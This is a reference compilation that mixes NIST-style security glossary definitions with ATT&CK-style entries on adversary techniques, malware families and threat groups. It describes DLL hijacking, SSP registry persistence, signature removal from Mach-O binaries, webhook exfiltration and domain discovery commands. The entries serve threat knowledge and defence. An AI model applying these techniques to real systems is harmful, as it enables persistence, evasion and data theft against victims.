Description: Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to Hide Infrastructure.

Term: general reference monitor concept
Definition: An abstract model of the necessary and sufficient properties that must be achieved by any mechanism that enforces a constraint.

Term: Key Management Policy
Definition: The Key Management Policy is a high-level statement of organizational key management policies that identifies high-level structure, responsibilities, governing standards and guidelines, organizational dependencies and other relationships, and security policies.

Term: public key certificate
Definition: A digital document issued and digitally signed by the private key of a certificate authority that binds an identifier to a subscriber to a public key. The certificate indicates that the subscriber identified in the certificate has sole control and access to the private key. See also RFC 5280.

Term: a | x
Definition: a divides x.

Term: SSP
Definition: Formal document that provides an overview of the security requirements for a system and describes the security controls in place or planned for meeting those requirements.

Term: Master key
Definition: A key used as an input to a key-derivation method to derive other keys; see SP 800-108.

Term: key
Definition: A parameter used in the block cipher algorithm that determines the forward cipher function.

Term: trustworthiness
Definition: The degree to which an information system (including the information technology components that are used to build the system) can be expected to preserve the confidentiality, integrity, and availability of the information being processed, stored, or transmitted by the system across the full range of threats. A trustworthy information system is a system that is believed to be capable of operating within defined levels of risk despite the environmental disruptions, human errors, structural failures, and purposeful attacks that are expected to occur in its environment of operation.

Name: Exfiltration Over Webhook
Type: attack-pattern
Description: Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server. Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello. When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. 

Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated Automated Exfiltration of emails, chat messages, and other data. Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.

Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.

Term: IS
Definition: An information system is a discrete set of information resources organized expressly for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information. Information systems also include specialized systems such as industrial/process controls systems, telephone switching/private branch exchange (PBX) systems, and environmental control systems.

Term: min-entropy
Definition: The min-entropy (in bits) of a random variable X is the largest value m having the property that each observation of X provides at least m bits of information (i.e., the min-entropy of X is the greatest lower bound for the information content of potential observations of X). The min-entropy of a random variable is a lower bound on its entropy. The precise formulation for min-entropy is - log2 (max pi) for a discrete distribution having event probabilities p1, ..., pk. Min-entropy is often used as a worst-case measure of the unpredictability of a random variable.

Term: Session
Definition: A persistent interaction between a subscriber and an endpoint, either an RP or a CSP. A session begins with an authentication event and ends with a session termination event. A session is bound by the use of a session secret that the subscriber’s software (e.g., browser, application, OS) can present to the RP to prove association of the session with the authentication event.

Term: Integrity Impact
Definition: measures the potential impact to integrity of a successfully exploited misuse vulnerability. Integrity refers to the trustworthiness and guaranteed veracity of information.

Term: risk analysis
Definition: The process of identifying, estimating, and prioritizing risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.

Term: Audience
Definition: The intended audience that should be able to install, test, and use the checklist, including suggested minimum skills and knowledge required to correctly use the checklist.

Term: module
Definition: Program unit that is discrete and identifiable with respect to compiling, combining with other units, and loading.

Term: VM
Definition: A simulated environment created by virtualization.

Term: <em>h</em>
Definition: An ECC domain parameter; the cofactor, a positive integer that is equal to the order of the elliptic curve group, divided by the order of the cyclic subgroup generated by the distinguished point G. That is, nh is the order of the elliptic curve, where n is the order of the cyclic subgroup generated by the distinguished point G.

Term: Hashed
Definition: The process whereby data (e.g., a message) was input to a cryptographic hash function (see Cryptographic hash function) to produce a hash value (see Hash value).

Term: Red Team/Blue Team Approach
Definition: A group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. The Red Team’s objective is to improve enterprise Information Assurance by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders (i.e., the Blue Team) in an operational environment.
1. The group responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers (i.e., the Red Team). Typically the Blue Team and its supporters must defend against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g., as part of an operational exercise), and 3) according to rules established and monitored with the help of a neutral group refereeing the simulation or exercise (i.e., the White Team).  
2. The term Blue Team is also used for defining a group of individuals that conduct operational network vulnerability evaluations and provide mitigation techniques to customers who have a need for an independent technical review of their network security posture. The Blue Team identifies security threats and risks in the operating environment, and in cooperation with the customer, analyzes the network environment and its current state of security readiness. Based on the Blue Team findings and expertise, they provide recommendations that integrate into an overall community security solution to increase the customer's cyber security readiness posture. Often a Blue Team is employed by itself or prior to a Red Team employment to ensure that the customer's networks are as secure as possible before having the Red Team test the systems.

Name: Winter Vivern
Type: intrusion-set
Description: Winter Vivern is a group linked to Russian and Belorussian interests active since at least 2020 targeting various European government and NGO entities, along with sporadic targeting of Indian and US victims. The group leverages a combination of document-based phishing activity and server-side exploitation for initial access, leveraging adversary-controlled and -created infrastructure for follow-on command and control.

Term: nonce
Definition: A time-varying value that has at most an acceptably small chance of repeating. For example, the nonce may be a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Name: Cutting Edge
Type: campaign
Description: Cutting Edge was a campaign conducted by suspected China-nexus espionage actors, variously identified as UNC5221/UTA0178 and UNC5325, that began as early as December 2023 with the exploitation of zero-day vulnerabilities in Ivanti Connect Secure (previously Pulse Secure) VPN appliances. Cutting Edge targeted the U.S. defense industrial base and multiple sectors globally including telecommunications, financial, aerospace, and technology. Cutting Edge featured the use of defense evasion and living-off-the-land (LoTL) techniques along with the deployment of web shells and other custom malware.

Term: Key splitting (k of n)
Definition: Splitting a key into n key splits so that for some k (where k < n), any k key splits of the key can be used to form the key, but having any k-1 key splits provides no knowledge of the key value.

Term: firmware
Definition: Computer programs and data stored in hardware - typically in read-only memory (ROM) or programmable read-only memory (PROM) - such that the programs and data cannot be dynamically written or modified during execution of the programs. See hardware and software.

Term: keying material
Definition: Data that is represented as a binary string such that any non-overlapping segments of the string with the required lengths can be used as symmetric cryptographic keys. In this Recommendation, keying material is derived from a shared secret established during an execution of a key-agreement scheme, or transported by the sender in a key-transport scheme. As used in this Recommendation, secret keying material may include keys, secret initialization vectors, and other secret parameters.

Term: network access
Definition: Access to a system by a user (or a process acting on behalf of a user) communicating through a network (e.g., local area network, wide area network, Internet).

Term: rowhammer attack
Definition: A software-based fault-injection attack that exploits dynamic random-access memory disturbance errors via user-space applications and allows the at­tacker to infer information about certain victim secrets stored in memory cells. Mounting this attack requires the attacker to control a user-space unprivileged process that runs on the same machine as the victim’s machine learning model.

Term: SP
Definition: A provider of basic services or value-added services for operation of a network; generally refers to public carriers and other commercial enterprises.

Name: XAgentOSX
Type: malware
Description: XAgentOSX is a trojan that has been used by APT28 on OS X and appears to be a port of their standard CHOPSTICK or XAgent trojan.

Term: element
Definition: ICT system element member of a set of elements that constitutes a system.

Name: SslMM
Type: malware
Description: SslMM is a full-featured backdoor used by Naikon that has multiple variants.

Name: S-Type
Type: malware
Description: S-Type is a backdoor that was used in Operation Dust Storm since at least 2013.

Name: Security Support Provider
Type: attack-pattern
Description: Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.

Name: Network Trust Dependencies
Type: attack-pattern
Description: Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).

Term: confidential algorithm
Definition: Cryptographic algorithm that is not publicly available (e.g. proprietary or classified).

Term: cryptographic key
Definition: A parameter used in the block cipher algorithm that determines the forward cipher operation and the inverse cipher operation.

Term: ICS
Definition: An information system used to control industrial processes such as manufacturing, product handling, production, and distribution.  Industrial control systems include supervisory control and data acquisition (SCADA) systems used to control geographically dispersed assets, as well as distributed control systems (DCSs) and smaller control systems using programmable logic controllers to control localized processes.

Term: joint authorization
Definition: Security authorization involving multiple authorizing officials.

Term: safeguards
Definition: Actions, devices, procedures, techniques, or other measures that reduce the vulnerability of a system. Synonymous with security controls and safeguards.

Term: risk analysis
Definition: The process of identifying, estimating, and prioritizing risks to organizational operations (i.e., mission, functions, image, reputation), organizational assets, individuals, and other organizations that result from the operation of a system. A risk assessment is part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls that are planned or in place. It is synonymous with “risk analysis.”

Term: blocklist
Definition: A documented list of specific elements that are blocked, per policy decision. This concept has historically been known as a “blacklist.”

Term: Product Component Host
Definition: The organization, individual, and/or system that hosts the product component. Product component hosts may provide support for or supersede the need to test criteria since they are expected to implement, control, and verify the criteria.

Term: contamination
Definition: See spillage.

Term: <em>[x]s</em>
Definition: The binary representation of the non-negative integer x as a string of s bits, where x < 2s.

Name: Brave Prince
Type: malware
Description: Brave Prince is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to Gold Dragon, and was seen along with Gold Dragon and RunningRAT in operations surrounding the 2018 Pyeongchang Winter Olympics.

Term: Federal Communications Commission identification number
Definition: an identifier found on all wireless phones legally sold in the US, which is issued by the FCC.

Term: block size
Definition: The number of bits in an input (or output) block of the block cipher.

Term: Multimedia Messaging Service (MMS)
Definition: An accepted standard for messaging that lets users send and receive messages formatted with text, graphics, photographs, audio, and video clips.

Term: media
Definition: Physical devices or writing surfaces including, but not limited to, magnetic tapes, optical disks, magnetic disks, large-scale integration (LSI) memory chips, and printouts (but not including display media) onto which information is recorded, stored, or printed within an information system.

Term: Sharding
Definition: A blockchain configuration and architecture that enables the processing of transactions in parallel. The blockchain’s global state is split among multiple blockchain subnetworks coordinated by a separate hub blockchain.

Term: Key destruction
Definition: To remove all traces of keying material so that it cannot be recovered by either physical or electronic means.

Term: <strong>Shall</strong>
Definition: A requirement that needs to be fulfilled to claim conformance to this Recommendation. Note that shall may be coupled with not to become shall not.

Term: fail safe
Definition: A mode of termination of system functions that prevents damage
See fail secure and fail soft for comparison.  to specified system resources and system entities (i.e., specified data, property, and life) when a failure occurs or is detected in the system (but the failure still might cause a security compromise).

Name: DLL
Type: attack-pattern
Description: Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.

Specific ways DLLs are abused by adversaries include:

### DLL Sideloading
Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).

Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.

Adversaries may also side-load other packages, such as BPLs (Borland Package Library).

Adversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware’s behavior. Another method implements a “loader-for-a-loader”, where a malicious DLL’s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. 

### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.

### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.

### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.

### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.

Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.

Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.

If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.

Term: <em>Alen</em>
Definition: The bit length of the associated data.

Term: Master key
Definition: A key used as an input to a key-derivation method to derive other keys. See [NIST SP 800-108].

Term: PIN Entry Device
Definition: An electronic device used in a debit, credit, or smart card-based transaction to accept and encrypt the cardholder's personal identification number.

Term: <em>Rb</em>
Definition: The constant string for subkey generation for a cipher with block size b.

Term: prompt injection
Definition: An attack which exploits the concatenation of untrusted input with a prompt constructed by a higher-trust party such as the application designer.

Term: security or privacy-relevant change
Definition: Any change to a system's configuration, environment, information content, functionality, or users which has the potential to change the risk imposed upon its continued operations.

Name: System Owner/User Discovery
Type: attack-pattern
Description: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, Network Device CLI commands such as `show users` and `show ssh` can be used to display users currently logged into the device.

Term: Virtualization
Definition: The simulation of the software and/or hardware upon which other software runs; this simulated environment is called a virtual machine

Term: Knowledge
Definition: a body of information applied directly to the performance of a function.

Term: Reporting
Definition: The final phase of the computer and network forensic process, which involves reporting the results of the analysis; this may include describing the actions used, explaining how tools and procedures were selected, determining what other actions need to be performed (e.g., forensic examination of additional data sources, securing identified vulnerabilities, improving existing security controls), and providing recommendations for improvement to policies, guidelines, procedures, tools, and other aspects of the forensic process. The formality of the reporting step varies greatly depending on the situation.

Name: Keydnap
Type: malware
Description: This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor .

Term: Symmetric Cryptography
Definition: A cryptographic algorithm that uses the same secret key for its operation and, if applicable, for reversing the effects of the operation (e.g., an AES key for encryption and decryption).

Name: Cobalt Strike
Type: malware
Description: Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.

In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.

Name: Firmware
Type: attack-pattern
Description: Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or Exploit Public-Facing Application).

Term: privileged account
Definition: An information system account with authorizations of a privileged user.

Name: BLUELIGHT
Type: malware
Description: BLUELIGHT is a remote access Trojan used by APT37 that was first observed in early 2021.

Term: ABAC
Definition: Access control based on attributes associated with and about subjects, objects, targets, initiators, resources, or the environment. An access control rule set defines the combination of attributes under which an access may take place. 
See also identity, credential, and access management (ICAM).

Term: Byte length
Definition: A positive integer that expresses the number of bytes in a byte string.

Term: MAC
Definition: A hardware address that uniquely identifies each component of an IEEE 802-based network. On networks that do not conform to the IEEE 802 standards but do conform to the OSI Reference Model, the node address is called the Data Link Control (DLC) address.

Name: Strider
Type: intrusion-set
Description: Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.

Name: DNS
Type: attack-pattern
Description: Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via DNS/Passive DNS. DNS information may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Active Scanning), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).

Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.

Term: information system component
Definition: An entity with discrete structure, such as an assembly or software module, within a system considered at a particular level of analysis. Component refers to a part of a whole, such as a component of a software product, a component of a software identification tag, etc.

Name: APT19
Type: intrusion-set
Description: APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same.

Term: crosslinks
Definition: Communication between satellites.

Term: defense-in-depth
Definition: An information security strategy that integrates people, technology, and operations capabilities to establish variable barriers across multiple layers and missions of the organization.

Term: adverse cybersecurity event
Definition: Any event with a potentially negative impact on cybersecurity.

Term: Semi-Passive Tag
Definition: A passive tag that uses a battery to power on-board circuitry or sensors but not to produce back channel signals.

Term: CD-Recordable
Definition: ACompact Disc Recordable(CD-R) is aCD thatcan be written on only once but read manytimes. Also known as WORM.

Term: cryptographic erase
Definition: A purge sanitization technique in which key sanitization is applied to one or more keys providing confidentiality protections for the encrypted target data, making recovery of the decrypted target data infeasible.

Term: Web Browser
Definition: Client software used to view Web content.

Term: availability
Definition: The security goal that generates the requirement for protection against intentional or accidental attempts to (1) perform unauthorized deletion of data or (2) otherwise cause a denial of service or data.

Term: Actual State
Definition: The observable state or behavior of an assessment object (device, software, person, credential, account, etc.) at the point in time when the collector generates security-related information. In particular, the actual state includes the states or behaviors that might indicate the presence of security defects.

Name: Domain Groups
Type: attack-pattern
Description: Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as <code>net group /domain</code> of the Net utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.

Term: data privacy
Definition: A condition that safeguards human autonomy and dignity through various means, including confidentiality, predictability, manageability, and disassociability.

Term: risk factor
Definition: A characteristic used in a risk model as an input to determining the level of risk in a risk assessment.

Term: architecture viewpoint
Definition: A work product establishing the conventions for the construction, interpretation, and use of architecture views to frame specific system concerns.

Term: TLS
Definition: An authentication and encryption protocol widely implemented in browsers and Web servers. HTTP traffic transmitted using TLS is known as HTTPS.

Term: Assurance of public key validity
Definition: Assurance of the arithmetic validity of the public key.

Term: key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. For the purposes of these guidelines, key requirements shall meet the minimum requirements stated in Table 2 of [SP 800-57 Part1].

Term: phishing resistance
Definition: The ability of the authentication protocol to prevent the disclosure of authentication secrets and valid authenticator outputs to an impostor verifier without reliance on the vigilance of the claimant.

Term: Web Server
Definition: A computer that provides World Wide Web (WWW) services on the Internet. It includes the hardware, operating system, Web server software, and Web site content (Web pages). If the Web server is used internally and not by the public, it may be known as an “intranet server.”

Term: competency area
Definition: A cluster of related Knowledge and Skill statements that correlates with one’s capability to perform Tasks in a particular domain. Competency Areas can help learners discover areas of interest, inform career planning and development, identify gaps for knowledge and skills development, and provide a means of assessing or demonstrating a learner’s capabilities in the domain.

Term: message digest
Definition: The result of applying a hash function to a message. Also known as a “hash value” or “hash output”.

Term: mechanism
Definition: A method, tool, or procedure that is the realization of security requirements. 
Note 1: A security mechanism exists in machine, technology, human, and physical forms. 
Note 2: A security mechanism reflects security and trust principles. 
Note 3: A security mechanism may enforce security policy and therefore must have capabilities consistent with the intent of the security policy.

Term: <em>KeyData</em>
Definition: Keying material other than that which is used for the MacKey employed in key confirmation.

Term: <em>LSBm(X)</em>
Definition: The bit string consisting of the m least significant bits of the bit string X.

Term: Internal Border Gateway Protocol
Definition: A BGP operation communicating routing information within an AS.

Name: Vulnerability Scanning
Type: attack-pattern
Description: Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to Gather Victim Host Information that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts. Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application).

Term: Privacy Event
Definition: The occurrence or potential occurrence of problematic data actions.

Term: Pseudorandom function (PRF)
Definition: Pseudorandom Function.

Name: Salt Typhoon
Type: intrusion-set
Description: Salt Typhoon is a People's Republic of China (PRC) state-backed actor that has been active since at least 2019 and responsible for numerous compromises of network infrastructure at major U.S. telecommunication and internet service providers (ISP).

Term: SCADA
Definition: A generic name for a computerized system that is capable of gathering and processing data and applying operational controls over long distances. Typical uses include power transmission and distribution and pipeline systems. SCADA was designed for the unique communication challenges (e.g., delays, data integrity) posed by the various media that must be used, such as phone lines, microwave, and satellite. Usually shared rather than dedicated.

Term: TMOVS
Definition: TDEA Modes of Operation Validation System

Term: security marking
Definition: The means used to associate a set of security attributes with objects in a human-readable form, to enable organizational process-based enforcement of information security policies.

Term: unbounded differential privacy
Definition: A unit of privacy variant that calls two datasets <em>D</em><sub>1</sub> and <i>D</i><sub>2</sub> neighbors if it is possible to construct <i>D</i><sub>2</sub> from <i>D</i><sub>1</sub> by adding or removing one person’s data. Under unbounded differential privacy, neighboring datasets have different sizes.

Term: SCAP source data stream
Definition: A bundle of SCAP components, along with the mappings of references between SCAP components, that holds input (source) content.

Name: Operation Ghost
Type: campaign
Description: Operation Ghost was an APT29 campaign starting in 2013 that included operations against ministries of foreign affairs in Europe and the Washington, D.C. embassy of a European Union country. During Operation Ghost, APT29 used new families of malware and leveraged web services, steganography, and unique C2 infrastructure for each victim.

Term: privileged command
Definition: A human-initiated command executed on an information system involving the control, monitoring, or administration of the system including security functions and associated security-relevant information.

Term: CKMS designer
Definition: The entity that selects the capabilities to be included in a CKMS, documents the design in accordance with the requirements specified in [NIST SP 800-130], and specifies a CKMS Security Policy that defines the rules that are to be enforced in the CKMS.

Term: Rapid elasticity
Definition: Capabilities can be elastically provisioned and released, in some cases automatically, to scale rapidly outward and inward commensurate with demand. To the consumer, the capabilities available for provisioning often appear to be unlimited and can be appropriated in any quantity at any time.

Term: trust
Definition: The confidence one element has in another, that the second element will behave as expected.

Name: Windows Permissions
Type: attack-pattern
Description: Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs). Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.

Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Term: block cipher
Definition: An invertible symmetric-key cryptographic algorithm that operates on fixed-length blocks of input using a secret key and an unvarying transformation algorithm. The resulting output block is the same length as the input block.

Name: AsyncRAT
Type: tool
Description: AsyncRAT is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.

Name: LC_LOAD_DYLIB Addition
Type: attack-pattern
Description: Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.

Name: HARDRAIN
Type: malware
Description: HARDRAIN is a Trojan malware variant reportedly used by the North Korean government.

Term: block cipher
Definition: A parameterized family of permutations on bit strings of a fixed length; the parameter that determines the permutation is a bit string called the key.

Term: Digital Evidence
Definition: Electronic information stored or transmitted in binary form.

Term: Fixed Dialing Numbers
Definition: a set of phone numbers kept on the SIM that the phone can call exclusively of any others (i.e., all other numbers are disallowed).

Term: security solution
Definition: The key design, architectural, and implementation choices made by organizations to satisfy specified security requirements for systems or system components.

Term: wrapping function
Definition: The keyed, length-preserving permutation that is applied to an enlarged form of the plaintext within the authenticated-encryption function to produce the ciphertext.

Term: Network Address Translation (NAT)
Definition: A function by which internet protocol (IP) addresses within a packet are replaced with different IP addresses. This function is most commonly performed by either routers or firewalls. It enables private IP networks that use unregistered IP addresses to connect to the internet. NAT operates on a router, usually connecting two networks together, and translates the private (not globally unique) addresses in the internal network into legal addresses before packets are forwarded to another network.

Term: Key-generating module
Definition: A cryptographic module in which a given key is generated.

Term: Pairwise Pseudonymous Identifier
Definition: A pseudonymous identifier generated by an IdP for use at a specific RP.

Term: Person
Definition: Any person considered as an asset by the management domain.

Term: Equivalent Process
Definition: Two processes are equivalent if, when the same values are input to each process, the same output is produced.

Name: Okrum
Type: malware
Description: Okrum is a Windows backdoor that has been seen in use since December 2016 with strong links to Ke3chang.

Term: Backup (system)
Definition: The process of copying information or processing status to a redundant system, service, device or medium that can provide the needed processing capability when needed.

Term: IoT Platform
Definition: A piece of IoT device hardware with supporting software already installed and configured for a manufacturer’s use as the basis of a new IoT device. An IoT platform might also offer third-party services or applications, or a software development kit to help expedite IoT application development.

Term: SOAP Message
Definition: The basic unit of communication between SOAP nodes.

Term: threat information
Definition: Analytical insights into trends, technologies, or tactics of an adversarial nature affecting information systems security.

Term: Keyed-Hash Message Authentication Code
Definition: Keyed-hash Message Authentication Code (as specified in FIPS 198-1).

Name: Local Data Staging
Type: attack-pattern
Description: Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.

Term: certified TEMPEST technical authority
Definition: An experienced, technically qualified U.S. Government employee who has met established certification requirements in accordance with CNSS approved criteria and has been appointed by a U.S. Government Department or Agency to fulfill CTTA responsibilities.

Term: Electronic Protected Health Information
Definition: Information that comes within paragraphs (1)(i) or (1)(ii) of the definition of protected health information as specified in this section (see “protected health information”).

Term: backdoor pattern
Definition: A transformation or insertion applied to a data sample that triggers an adversary-specified behaviour in a model that has been subject to a backdoor poi­soning attack. For example, in computer vision, an adversary could poison a model such that the insertion of a square of white pixels induces a desired target label.

Term: credential service provider (CSP)
Definition: A trusted entity that issues or registers subscriber authenticators and issues electronic credentials to subscribers. A CSP may be an independent third party or issue credentials for its own use.

Term: attribute
Definition: An attribute is any distinctive feature, characteristic, or property of an object that can be identified or isolated quantitatively or qualitatively by either human or automated means.

Term: <i>K<sub>OUT</sub></i>
